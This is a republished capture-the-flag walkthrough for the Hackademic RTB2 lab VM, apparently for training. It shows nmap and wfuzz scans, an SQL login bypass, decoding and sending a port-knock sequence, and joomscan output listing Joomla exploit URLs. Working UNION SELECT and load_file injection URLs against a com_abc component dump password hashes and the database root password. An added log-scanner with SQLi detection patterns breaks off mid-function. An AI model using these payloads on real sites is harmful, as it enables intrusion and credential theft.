Lab - Hackademic RTB2

Source: Internet | Published by: WeChat one-click forwarding software (Apple) | Editor: 程序博客网 (Programmer Blog Network) | Time: 2024/05/29 20:01

Description

Hackademic RTB2 is the second edition of Hackademic vulnerable Virtual Machine. The first challenge is described here.

Installation

Hackademic RTB2 can be downloaded from the following places:

  • http://dc97.4shared.com/download/-pIYENTQ/HackademicRTB2.zip
  • https://rapidshare.com/files/4089592556/Hackademic.RTB2.zip
  • http://download.vulnhub.com/hackademic/Hackademic.RTB2.zip

Environment

  • Attacker: 192.168.1.111 (Kali)
  • Victim: 192.168.1.100 (VirtualBox)

Should you need to discover the IP address of your target, use tools like fping, netdiscover or nmap.

Discover online hosts with nmap.

nmap -v -sn -d -oA online 192.168.1.1/24
root:~ /# grep "Status: Up" online.gnmap
Host: 192.168.1.1 ()    Status: Up
Host: 192.168.1.100 ()  Status: Up
Host: 192.168.1.108 ()  Status: Up
Host: 192.168.1.109 ()  Status: Up
Host: 192.168.1.187 ()  Status: Up
Host: 192.168.1.111 ()  Status: Up

Scan ports with nmap

nmap -v -n -Pn -sS -oA port -sV -p- -iL scanhosts.txt

Assessment

Services/Versions

A first nmap scan shows a web server on port 80/tcp and a service on port 666/tcp that looks filtered:

root@kali:~# nmap -v -d -sV -p- 192.168.1.109
....
Nmap scan report for 192.168.1.109
Host is up (0.00048s latency).
Not shown: 65533 closed ports
PORT    STATE    SERVICE VERSION
80/tcp  open     http    Apache httpd 2.2.14 ((Ubuntu))
666/tcp filtered doom
MAC Address: 08:00:27:26:7E:A8 (Cadmus Computer Systems)
....

The filtered state suggests port knocking: once the right sequence has been sent, port 666/tcp shows up as open and hosts a web service. There is also a DNS-based service on port 5353/udp.


Web service

Let’s analyze what could be interesting on port 80/tcp. Point your browser to the root of the target:

Using wfuzz also discloses the presence of a phpmyadmin interface:

root:~ /# wfuzz -c --hc 404 -z file,/usr/share/dirbuster/wordlists/directory-list-2.3-small.txt http://192.168.1.109/FUZZ/
********************************************************
* Wfuzz  2.0 - The Web Bruteforcer                     *
********************************************************

Target: http://192.168.1.109/FUZZ/
Payload type: file,/usr/share/dirbuster/wordlists/directory-list-2.3-small.txt

Total requests: 87664
==================================================================
ID      Response   Lines      Word         Chars          Request
==================================================================
00017:  C=403     10 L        30 W          289 Ch        " - cgi-bin"
00074:  C=200   1002 L      4785 W        72044 Ch        " - icons"
00204:  C=403     10 L        30 W          285 Ch        " - doc"
00525:  C=200     37 L       103 W         1324 Ch        " - #"
00524:  C=200     37 L       103 W         1324 Ch        " - index"
00528:  C=200     37 L       103 W         1324 Ch        "ered case sensative list, where entries were found"
00529:  C=200     37 L       103 W         1324 Ch        " - #"
00530:  C=200     37 L       103 W         1324 Ch        " Suite 300, San Francisco, California, 94105, USA."
00531:  C=200     37 L       103 W         1324 Ch        " - # on atleast 3 different hosts"
00532:  C=200     37 L       103 W         1324 Ch        "d a letter to Creative Commons, 171 Second Street,"
00533:  C=200     37 L       103 W         1324 Ch        " - "
00534:  C=200     37 L       103 W         1324 Ch        "sit http://creativecommons.org/licenses/by-sa/3.0/"
00535:  C=200     37 L       103 W         1324 Ch        "on-Share Alike 3.0 License. To view a copy of this"
00536:  C=200     37 L       103 W         1324 Ch        "# This work is licensed under the Creative Commons"
00537:  C=200     37 L       103 W         1324 Ch        " - # Copyright 2007 James Fisher"
00538:  C=200     37 L       103 W         1324 Ch        " - #"
00541:  C=200     37 L       103 W         1324 Ch        " - #"
00549:  C=200     37 L       103 W         1324 Ch        " - # directory-list-2.3-small.txt"
01064:  C=403     10 L        30 W          292 Ch        " - javascript"
01318:  C=200     15 L        30 W          324 Ch        " - check"
11356:  C=200    138 L       516 W         8625 Ch        " - phpmyadmin"
45597:  C=200     37 L       103 W         1324 Ch        " - "

Find vulnerabilities in the first form

Let's try to find a vulnerability in the first authentication form. I have used W3AF as well as Sqlmap but have found no SQL injection. Fuzzing the password field with Burp Suite (Intruder module) leads to the discovery of an SQL injection string that is accepted.

Notice that it is a real fuzzing exercise here (I must confess it is also a little bit by chance) to discover the injection: you will have to use the full list of SQL injection strings from Burp Suite and also suffix them with a single quote. In fact, the authentication mechanism does not use a database at all. The PHP code (see check.php under Sources) shows that the following combination is hard coded:

  • login: admin
  • password: ' or 1=1--'

This combination leads to a new message as well as a long encoded string:

<h2>Ok, nice shot...<br></h2>...but, you are looking in a wrong place bro! ;-)<br><br><font color="black">%33%63%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%33%65%20%30%64%20%30%61%20%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%32%30%20%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%32%30%20%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%36%39%20%36%65%20%32%37%20%32%30%20%36%66%20%36%65%20%32%30%20%36%38%20%36%35%20%36%31%20%37%36%20%36%35%20%36%65%20%32%37%20%37%33%20%32%30%20%36%34%20%36%66%20%36%66%20%37%32%20%32%30%20%32%65%20%32%65%20%32%30%20%33%61%20%32%39%20%30%64%20%30%61%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%31%20%33%30%20%33%31%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%31%20%33%30%20%33%31%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%31%20%33%30%20%33%31%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%
30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%30%64%20%30%61%20%33%63%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%33%65%0A</font color="black">

Decoding it with HackBar (URL decode) gives the following string of hex bytes, which in turn decodes to the ASCII text shown after it:

3c 2d 2d 2d 2d 2d 2d 2d 2d 2d 3e 0d 0a 4b 6e 6f 63 6b 20 4b 6e 6f 63 6b 20 4b 6e 6f 63 6b 69 6e 27 20 6f 6e 20 68 65 61 76 65 6e 27 73 20 64 6f 6f 72 20 2e 2e 20 3a 29 0d 0a 30 30 31 31 30 30 30 31 20 30 30 31 31 30 30 30 30 20 30 30 31 31 30 30 30 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 31 30 31 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 30 30 30 31 20 30 30 31 31 30 30 30 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 31 30 31 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 30 30 30 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 30 30 30 31 20 30 30 31 31 31 30 31 30 20 30 30 31 31 30 30 30 31 20 30 30 31 31 30 30 30 30 20 30 30 31 31 30 30 30 30 20 30 30 31 31 30 30 30 31 0d 0a 3c 2d 2d 2d 2d 2d 2d 2d 2d 2d 3e
<--------->
Knock Knock Knockin' on heaven's door .. :)
00110001 00110000 00110000 00110001 00111010 00110001 00110001 00110000 00110001 00111010 00110001 00110000 00110001 00110001 00111010 00110001 00110000 00110000 00110001
<--------->

Write two Python scripts: one to decode the binary string into the knock sequence, the other to perform the port knock.

Decode KNOCK PORT STRING

>>> binstr = "00110001 00110000 00110000 00110001 00111010 00110001 00110001 00110000 00110001 00111010 00110001 00110000 00110001 00110001 00111010 00110001 00110000 00110000 00110001"
>>> bins = binstr.split(" ")
>>> bins
['00110001', '00110000', '00110000', '00110001', '00111010', '00110001', '00110001', '00110000', '00110001', '00111010', '00110001', '00110000', '00110001', '00110001', '00111010', '00110001', '00110000', '00110000', '00110001']
>>> bin2str = [chr(int(i, 2)) for i in bins]
>>> bin2str
['1', '0', '0', '1', ':', '1', '1', '0', '1', ':', '1', '0', '1', '1', ':', '1', '0', '0', '1']
>>> "".join(bin2str)
'1001:1101:1011:1001'
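The whole decoding chain as a single script (an added example, not part of the original write-up): it takes the percent-encoded string that check.php prints, URL-decodes it into hex words, turns those into text and pulls the 8-bit binary groups out into the knock sequence. The sample input is constructed here by re-encoding the decoded message shown above the same way the page encodes it, so the script runs offline.

```python
"""Decode the Hackademic RTB2 "knock" message end to end.

Layers, outermost first: percent-encoding (%XX per character) -> text made of
space-separated hex bytes ("3c 2d 2d ...") -> ASCII message -> a row of 8-bit
binary groups that spell the knock sequence "1001:1101:1011:1001".
"""
import re
from typing import List, Tuple
from urllib.parse import unquote

# Plain-text message exactly as the write-up decodes it (constructed sample).
KNOCK_TEXT = (
    "<--------->\r\n"
    "Knock Knock Knockin' on heaven's door .. :)\r\n"
    "00110001 00110000 00110000 00110001 00111010 "
    "00110001 00110001 00110000 00110001 00111010 "
    "00110001 00110000 00110001 00110001 00111010 "
    "00110001 00110000 00110000 00110001\r\n"
    "<--------->"
)

BIN_OCTET = re.compile(r"\b[01]{8}\b")


def encode_like_page(text: str) -> str:
    """Rebuild the page's encoding (only used to construct the sample input).

    text -> "xx xx xx\n" hex words -> every character percent-encoded.
    """
    hex_words = " ".join("%02x" % b for b in text.encode("ascii")) + "\n"
    return "".join("%%%02x" % ord(c) for c in hex_words)


def percent_to_hexwords(encoded: str) -> str:
    """Outer layer: URL-decode the %XX string into the hex-word text."""
    return unquote(encoded)


def hexwords_to_text(hex_words: str) -> str:
    """Middle layer: 'xx xx xx' -> bytes -> ASCII text (fromhex skips spaces)."""
    return bytes.fromhex(hex_words.strip()).decode("ascii", errors="replace")


def text_to_knock_sequence(text: str) -> List[int]:
    """Inner layer: 8-bit groups -> characters -> ':'-separated port list."""
    chars = "".join(chr(int(octet, 2)) for octet in BIN_OCTET.findall(text))
    if not chars:
        raise ValueError("no 8-bit binary groups found in message")
    ports = []
    for part in chars.split(":"):
        # Each token must be a valid TCP port, otherwise the message is not
        # the knock format we expect.
        if not part.isdigit() or not 1 <= int(part) <= 65535:
            raise ValueError("unexpected knock token %r" % part)
        ports.append(int(part))
    return ports


def decode_knock_message(encoded: str) -> Tuple[str, List[int]]:
    """Full chain: percent-encoded -> hex words -> text -> knock sequence."""
    text = hexwords_to_text(percent_to_hexwords(encoded))
    return text, text_to_knock_sequence(text)


# Constructed sample input; its first bytes match the page's "%33%63%20%32%64".
SAMPLE_ENCODED = encode_like_page(KNOCK_TEXT)

if __name__ == "__main__":
    message, knock = decode_knock_message(SAMPLE_ENCODED)
    print(message)
    print("knock sequence:", knock)
```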

KNOCK PORT

#!/usr/bin/env python
# -*- coding: utf8 -*-
import socket

host = "192.168.1.109"
ports = "1001:1101:1011:1001"

# One fresh socket per knock with a short timeout: the knock ports answer
# with a reset (or nothing at all), so connect_ex() returns an error code
# quickly instead of raising, and the next port in the sequence is tried.
for port in ports.split(":"):
    print("[*] knock %s port %s" % (host, port))
    csock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    csock.settimeout(1)
    csock.connect_ex((host, int(port)))
    csock.close()

root:~ /# python knock_door.py
[*] knock 192.168.1.109 port 1001
[*] knock 192.168.1.109 port 1101
[*] knock 192.168.1.109 port 1011
[*] knock 192.168.1.109 port 1001
root:~ /# ncat -v 192.168.1.109 666
Ncat: Version 6.47 ( http://nmap.org/ncat )
Ncat: Connected to 192.168.1.109:666.
^C

or

knock -v 192.168.1.109 1001 1101 1011 1001

Find a vulnerability in the second application

Now it is time to find a vulnerability in the second application, the Joomla portal, starting with a SQL injection. Sqlmap leads to the disclosure of the MySQL users (the injection points and the extracted data are shown below). We can also use joomscan to discover vulnerabilities:

lab:joomscan/ $ perl joomscan.pl -u "http://192.168.1.109:666/"

=================================================================
OWASP Joomla! Vulnerability Scanner v0.0.4
(c) Aung Khant, aungkhant]at[yehg.net
YGN Ethical Hacker Group, Myanmar, http://yehg.net/lab
Update by: Web-Center, http://web-center.si (2011)
=================================================================

Vulnerability Entries: 611
Last update: February 2, 2012

Use "update" option to update the database
Use "check" option to check the scanner update
Use "download" option to download the scanner latest version package
Use svn co to update the scanner and the database
svn co https://joomscan.svn.sourceforge.net/svnroot/joomscan joomscan

Target: http://192.168.1.109:666
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7

## Checking if the target has deployed an Anti-Scanner measure
[!] Scanning Passed ..... OK

## Detecting Joomla! based Firewall ...
[!] No known firewall detected!

## Fingerprinting in progress ...
~Generic version family ....... [1.5.x]
~1.5.x en-GB.ini revealed [1.5.12 - 1.5.14]
* Deduced version range is : [1.5.12 - 1.5.14]
## Fingerprinting done.

## 3 Components Found in front page
com_mailto  com_user    com_abc

Vulnerabilities Discovered
==========================

# 1
Info -> Generic: htaccess.txt has not been renamed.
Versions Affected: Any
Check: /htaccess.txt
Exploit: Generic defenses implemented in .htaccess are not available, so exploiting is more likely to succeed.
Vulnerable? Yes

# 2
Info -> Generic: Unprotected Administrator directory
Versions Affected: Any
Check: /administrator/
Exploit: The default /administrator directory is detected. Attackers can bruteforce administrator accounts. Read: http://yehg.net/lab/pr0js/view.php/MULTIPLE%20TRICKY%20WAYS%20TO%20PROTECT.pdf
Vulnerable? N/A

# 3
Info -> Core: Multiple XSS/CSRF Vulnerability
Versions Affected: 1.5.9 <=
Check: /?1.5.9-x
Exploit: A series of XSS and CSRF faults exist in the administrator application. Affected administrator components include com_admin, com_media, com_search. Both com_admin and com_search contain XSS vulnerabilities, and com_media contains 2 CSRF vulnerabilities.
Vulnerable? No

# 4
Info -> Core: JSession SSL Session Disclosure Vulnerability
Versions effected: Joomla! 1.5.8 <=
Check: /?1.5.8-x
Exploit: When running a site under SSL (the entire site is forced to be under ssl), Joomla! does not set the SSL flag on the cookie. This can allow someone monitoring the network to find the cookie related to the session.
Vulnerable? No

# 5
Info -> Core: Frontend XSS Vulnerability
Versions effected: 1.5.10 <=
Check: /?1.5.10-x
Exploit: Some values were output from the database without being properly escaped. Most strings in question were sourced from the administrator panel. Malicious normal admin can leverage it to gain access to super admin.
Vulnerable? No

# 6
Info -> Core: Missing JEXEC Check - Path Disclosure Vulnerability
Versions effected: 1.5.11 <=
Check: /libraries/phpxmlrpc/xmlrpcs.php
Exploit: /libraries/phpxmlrpc/xmlrpcs.php
Vulnerable? No

# 7
Info -> Core: Missing JEXEC Check - Path Disclosure Vulnerability
Versions effected: 1.5.12 <=
Check: /libraries/joomla/utilities/compat/php50x.php
Exploit: /libraries/joomla/utilities/compat/php50x.php
Vulnerable? No

# 8
Info -> Core: Frontend XSS - HTTP_REFERER not properly filtered Vulnerability
Versions effected: 1.5.11 <=
Check: /?1.5.11-x-http_ref
Exploit: An attacker can inject JavaScript or DHTML code that will be executed in the context of targeted user browser, allowing the attacker to steal cookies. HTTP_REFERER variable is not properly parsed.
Vulnerable? No

# 9
Info -> Core: Frontend XSS - PHP_SELF not properly filtered Vulnerability
Versions effected: 1.5.11 <=
Check: /?1.5.11-x-php-s3lf
Exploit: An attacker can inject JavaScript code in a URL that will be executed in the context of targeted user browser.
Vulnerable? No

# 10
Info -> Core: Authentication Bypass Vulnerability
Versions effected: Joomla! 1.5.3 <=
Check: /administrator/
Exploit: Backend accepts any password for custom Super Administrator when LDAP enabled
Vulnerable? No

# 11
Info -> Core: Path Disclosure Vulnerability
Versions effected: Joomla! 1.5.3 <=
Check: /?1.5.3-path-disclose
Exploit: Crafted URL can disclose absolute path
Vulnerable? No

# 12
Info -> Core: User redirected Spamming Vulnerability
Versions effected: Joomla! 1.5.3 <=
Check: /?1.5.3-spam
Exploit: User redirect spam
Vulnerable? No

# 13
Info -> Core: joomla.php Remote File Inclusion Vulnerability
Versions effected: 1.0.0
Check: /includes/joomla.php
Exploit: /includes/joomla.php?includepath=
Vulnerable? No

# 14
Info -> Core: Admin Backend Cross Site Request Forgery Vulnerability
Versions effected: 1.0.13 <=
Check: /administrator/
Exploit: It requires an administrator to be logged in and to be tricked into a specially crafted webpage.
Vulnerable? Yes

# 15
Info -> Core: Path Disclosure Vulnerability
Versions effected: Joomla! 1.5.12 <=
Check: /libraries/joomla/utilities/compat/php50x.php
Exploit: /libraries/joomla/utilities/compat/php50x.php
Vulnerable? No

# 16
Info -> CorePlugin: Xstandard Editor X_CMS_LIBRARY_PATH Local Directory Traversal Vulnerability
Versions effected: Joomla! 1.5.8 <=
Check: /plugins/editors/xstandard/attachmentlibrary.php
Exploit: Submit new header X_CMS_LIBRARY_PATH with value ../ to /plugins/editors/xstandard/attachmentlibrary.php
Vulnerable? No

# 17
Info -> CoreTemplate: ja_purity XSS Vulnerability
Versions effected: 1.5.10 <=
Check: /templates/ja_purity/
Exploit: A XSS vulnerability exists in the JA_Purity template which ships with Joomla! 1.5.
Vulnerable? No

# 18
Info -> CoreLibrary: phpmailer Remote Code Execution Vulnerability
Versions effected: Joomla! 1.5.0 Beta/Stable
Check: /libraries/phpmailer/phpmailer.php
Exploit: N/A
Vulnerable? No

# 19
Info -> CorePlugin: TinyMCE TinyBrowser addon multiple vulnerabilities
Versions effected: Joomla! 1.5.12
Check: /plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/
Exploit: While Joomla! team announced only File Upload vulnerability, in fact there are many. See: http://www.milw0rm.com/exploits/9296
Vulnerable? Yes

# 20
Info -> CoreComponent: Joomla Remote Admin Password Change Vulnerability
Versions Affected: 1.5.5 <=
Check: /components/com_user/controller.php
Exploit: 1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm 2. Write into field "token" char ' and Click OK. 3. Write new password for admin 4. Go to url : target.com/administrator/ 5. Login admin with new password
Vulnerable? No

# 21
Info -> CoreComponent: com_content SQL Injection Vulnerability
Version Affected: Joomla! 1.0.0 <=
Check: /components/com_content/
Exploit: /index.php?option=com_content&task=blogcategory&id=60&Itemid=99999+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Vulnerable? No

# 22
Info -> CoreComponent: com_search Remote Code Execution Vulnerability
Version Affected: Joomla! 1.5.0 beta 2 <=
Check: /components/com_search/
Exploit: /index.php?option=com_search&Itemid=1&searchword=%22%3Becho%20md5(911)%3B
Vulnerable? No

# 23
Info -> CoreComponent: MailTo SQL Injection Vulnerability
Versions effected: N/A
Check: /components/com_mailto/
Exploit: /index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+concat(username,char(58),password)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--&Itemid=1
Vulnerable? No

# 24
Info -> CoreComponent: com_content Blind SQL Injection Vulnerability
Versions effected: Joomla! 1.5.0 RC3
Check: /components/com_content/
Exploit: /index.php?option=com_content&view=%' +'a'='a&id=25&Itemid=28
Vulnerable? No

# 25
Info -> CoreComponent: com_content XSS Vulnerability
Version Affected: Joomla! 1.5.7 <=
Check: /components/com_content/
Exploit: The defaults on com_content article submission allow entry of dangerous HTML tags (script, etc). This only affects users with access level Author or higher, and only if you have not set filtering options in com_content configuration.
Vulnerable? No

# 26
Info -> CoreComponent: com_weblinks XSS Vulnerability
Version Affected: Joomla! 1.5.7 <=
Check: /components/com_weblinks/
Exploit: [Requires valid user account] com_weblinks allows raw HTML into the title and description tags for weblink submissions (from both the administrator and site submission forms).
Vulnerable? No

# 27
Info -> CoreComponent: com_mailto Email Spam Vulnerability
Version Affected: Joomla! 1.5.6 <=
Check: /components/com_mailto/
Exploit: The mailto component does not verify validity of the URL prior to sending.
Vulnerable? No

# 28
Info -> CoreComponent: com_content view=archive SQL Injection Vulnerability
Versions effected: Joomla! 1.5.0 Beta1/Beta2/RC1
Check: /components/com_content/
Exploit: Unfiltered POST vars - filter, month, year to /index.php?option=com_content&view=archive
Vulnerable? No

# 29
Info -> CoreComponent: com_content XSS Vulnerability
Version Affected: Joomla! 1.5.9 <=
Check: /components/com_content/
Exploit: A XSS vulnerability exists in the category view of com_content.
Vulnerable? No

# 30
Info -> CoreComponent: com_search Memory Comsumption DoS Vulnerability
Versions effected: Joomla! 1.5.0 Beta
Check: /components/com_search/
Exploit: N/A
Vulnerable? No

# 31
Info -> CoreComponent: com_poll (mosmsg) Memory Consumption DOS Vulnerability
Versions effected: 1.0.7 <=
Check: /components/com_poll/
Exploit: Send request /index.php?option=com_poll&task=results&id=14&mosmsg=DOS@HERE<<>AAA<><>
Vulnerable? No

# 32
Info -> CoreComponent: com_banners Blind SQL Injection Vulnerability
Versions effected: N/A
Check: /components/com_banners/
Exploit: /index.php?option=com_banners&task=archivesection&id=0'+and+'1'='1::/index.php?option=com_banners&task=archivesection&id=0'+and+'1'='2
Vulnerable? No

# 33
Info -> CoreComponent: com_mailto timeout Vulnerability
Versions effected: 1.5.13 <=
Check: /components/com_mailto/
Exploit: [Requires a valid user account] In com_mailto, it was possible to bypass timeout protection against sending automated emails.
Vulnerable? Yes

# 34
Info -> Component: Amblog SQL Injection
Versions Affected: 1.0
Check: /index.php?option=com_amblog&view=amblog&catid=-1UNIONSELECT@@version
Exploit: /index.php?option=com_amblog&view=amblog&catid=-1 UNION SELECT @@version
Vulnerable? No

# 35
Info -> Component: Component com_newsfeeds SQL injection
Versions Affected: Any <=
Check: /index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--
Exploit: /index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--
Vulnerable? No

# 36
Info -> Component: ABC Extension com_abc SQL
Versions Affected: 1.1.7 <=
Check: /index.php?option=com_abc&view=abc&letter=AS&sectionid='
Exploit: /index.php?option=com_abc&view=abc&letter=AS&sectionid='
Vulnerable? N/A

# 37
Info -> Component: Joomla Component com_searchlog SQL Injection
Versions Affected: 3.1.0 <=
Check: /administrator/index.php?option=com_searchlog&act=log
Exploit: /administrator/index.php?option=com_searchlog&act=log
Vulnerable? No

# 38
Info -> Component: Joomla Component com_djartgallery Multiple Vulnerabilities
Versions Affected: 0.9.1 <=
Check: /administrator/index.php?option=com_djartgallery&task=editItem&cid[]=1'+and+1=1+--+
Exploit: /administrator/index.php?option=com_djartgallery&task=editItem&cid[]=1'+and+1=1+--+
Vulnerable? N/A

There are 4 vulnerable points in 38 found entries!

~[*] Time Taken: 30 sec
~[*] Send bugs, suggestions, contributions to joomscan@yehg.net

The SQL injection points (in the com_abc component) are as follows:

http://192.168.1.109:666/index.php?option=com_abc&view=abc&letter=AS&sectionid=%27
http://192.168.1.109:666/index.php?option=com_abc&view=abc&letter=List+of+content+items...%27&Itemid=3

Get PHPMYADMIN USERS

http://192.168.1.109:666/index.php?option=com_abc&view=abc&letter=List+of+content+items...%27%20union%20all%20select%201,(SELECT%20GROUP_CONCAT(User,0x7c,password)%20from%20`mysql`.`user`)--%20\&Itemid=3

root|*5D3C124406BF85494067182754131FF4DAB9C6C7,root|*5D3C124406BF85494067182754131FF4DAB9C6C7,root|*5D3C124406BF85494067182754131FF4DAB9C6C7,debian-sys-maint|*F36E6519B0B1D62AA2D5346EFAD66D1CAF248996,phpmyadmin|*5D3C124406BF85494067182754131FF4DAB9C6C7

Get Joomla Users

http://192.168.1.109:666/index.php?option=com_abc&view=abc&letter=List+of+content+items...%27%20union%20all%20select%201,%28SELECT%20GROUP_CONCAT%28username,0x7c,password%29%20from%20%60joomla%60.%60jos_users%60%29--%20\&Itemid=3

Administrator|08f43b7f40fb0d56f6a8fb0271ec4710:n9RMVci9nqTUog3GjVTNP7IuOrPayqAl,JSmith|992396d7fc19fd76393f359cb294e300:70NFLkBrApLamH9VNGjlViJLlJsB60KF,BTallor|abe1ae513c16f2a021329cc109071705:FdOrWkL8oMGl1Tju0aT7ReFsOwIMKliy

Get the phpMyAdmin (MySQL root) credentials from the Joomla configuration file

http://192.168.1.109:666/index.php?option=com_abc&view=abc&letter=List+of+content+items...%27%20union%20all%20select%201,load_file(%27/var/www/configuration.php%27)--%20a&Itemid=3

<?php
class JConfig {
/* Site Settings */
var $offline = '0';
var $offline_message = 'This site is down for maintenance.<br /> Please check back again soon.';
var $sitename = 'Hackademic.RTB2';
var $editor = 'tinymce';
var $list_limit = '20';
var $legacy = '0';
/* Debug Settings */
var $debug = '0';
var $debug_lang = '0';
/* Database Settings */
var $dbtype = 'mysql';
var $host = 'localhost';
var $user = 'root';
var $password = 'yUtJklM97W';
var $db = 'joomla';
var $dbprefix = 'jos_';
/* Server Settings */
var $live_site = '';
var $secret = 'iFzlVUCg9BBPoUDU';
var $gzip = '0';
var $error_reporting = '-1';
var $helpurl = 'http://help.joomla.org';
var $xmlrpc_server = '0';
var $ftp_host = '127.0.0.1';
var $ftp_port = '21';
var $ftp_user = '';
var $ftp_pass = '';
var $ftp_root = '';
var $ftp_enable = '0';
var $force_ssl = '0';
/* Locale Settings */
var $offset = '0';
var $offset_user = '0';
/* Mail Settings */
var $mailer = 'mail';
var $mailfrom = 'admin@hackademirtb2.com';
var $fromname = 'Hackademic.RTB2';
var $sendmail = '/usr/sbin/sendmail';
var $smtpauth = '0';
var $smtpsecure = 'none';
var $smtpport = '25';
var $smtpuser = '';
var $smtppass = '';
var $smtphost = 'localhost';
/* Cache Settings */
var $caching = '0';
var $cachetime = '15';
var $cache_handler = 'file';
/* Meta Settings */
var $MetaDesc = 'Joomla! - the dynamic portal engine and content management system';
var $MetaKeys = 'joomla, Joomla';
var $MetaTitle = '1';
var $MetaAuthor = '1';
/* SEO Settings */
var $sef           = '0';
var $sef_rewrite   = '0';
var $sef_suffix    = '0';
/* Feed Settings */
var $feed_limit   = 10;
var $feed_email   = 'author';
var $log_path = '/var/www/logs';
var $tmp_path = '/var/www/tmp';
/* Session Setting */
var $lifetime = '15';
var $session_handler = 'database';
}
?>
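From the defender's side, the three injected com_abc requests above leave an obvious trail in the web server log. The following script is an added example (not from the write-up): it parses Apache combined-format lines, URL-decodes every query parameter and flags the UNION SELECT, load_file(), GROUP_CONCAT() and mysql.user patterns used here; the log lines are constructed from the URLs shown above and the combined log format is an assumption.

```python
"""Flag the com_abc SQL injection requests in an Apache access log."""
import re
from typing import Dict, List
from urllib.parse import parse_qsl, urlsplit

# Constructed sample: one benign com_abc hit followed by the three injection
# requests from the write-up (timestamps and sizes are made up).
SAMPLE_LOG = """\
192.168.1.111 - - [11/Jul/2015:22:10:01 -0400] "GET /index.php?option=com_abc&view=abc&letter=A&Itemid=3 HTTP/1.1" 200 4210 "-" "Mozilla/5.0"
192.168.1.111 - - [11/Jul/2015:22:11:05 -0400] "GET /index.php?option=com_abc&view=abc&letter=AS&sectionid=%27 HTTP/1.1" 500 1220 "-" "Mozilla/5.0"
192.168.1.111 - - [11/Jul/2015:22:12:40 -0400] "GET /index.php?option=com_abc&view=abc&letter=List+of+content+items...%27%20union%20all%20select%201,(SELECT%20GROUP_CONCAT(User,0x7c,password)%20from%20`mysql`.`user`)--%20\\&Itemid=3 HTTP/1.1" 200 4802 "-" "sqlmap/1.0"
192.168.1.111 - - [11/Jul/2015:22:14:12 -0400] "GET /index.php?option=com_abc&view=abc&letter=List+of+content+items...%27%20union%20all%20select%201,load_file(%27/var/www/configuration.php%27)--%20a&Itemid=3 HTTP/1.1" 200 6031 "-" "Mozilla/5.0"
"""

# Apache combined log format (assumed): client, ident, user, [time], "request", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Signatures are matched against the URL-decoded value of each parameter,
# so %20/+ spacing and %27 quoting do not hide them.
SIGNATURES = [
    ("union_select", re.compile(r"union\s+(all\s+)?select", re.I)),
    ("load_file", re.compile(r"load_file\s*\(", re.I)),
    ("group_concat", re.compile(r"group_concat\s*\(", re.I)),
    ("mysql_user_table", re.compile(r"`?mysql`?\s*\.\s*`?user`?", re.I)),
    # Exactly one quote in a value: the bare probe joomscan listed (sectionid=').
    ("unbalanced_quote", re.compile(r"^[^']*'[^']*$")),
]


def decoded_params(path: str) -> Dict[str, str]:
    """Return the query parameters of a request path, URL-decoded."""
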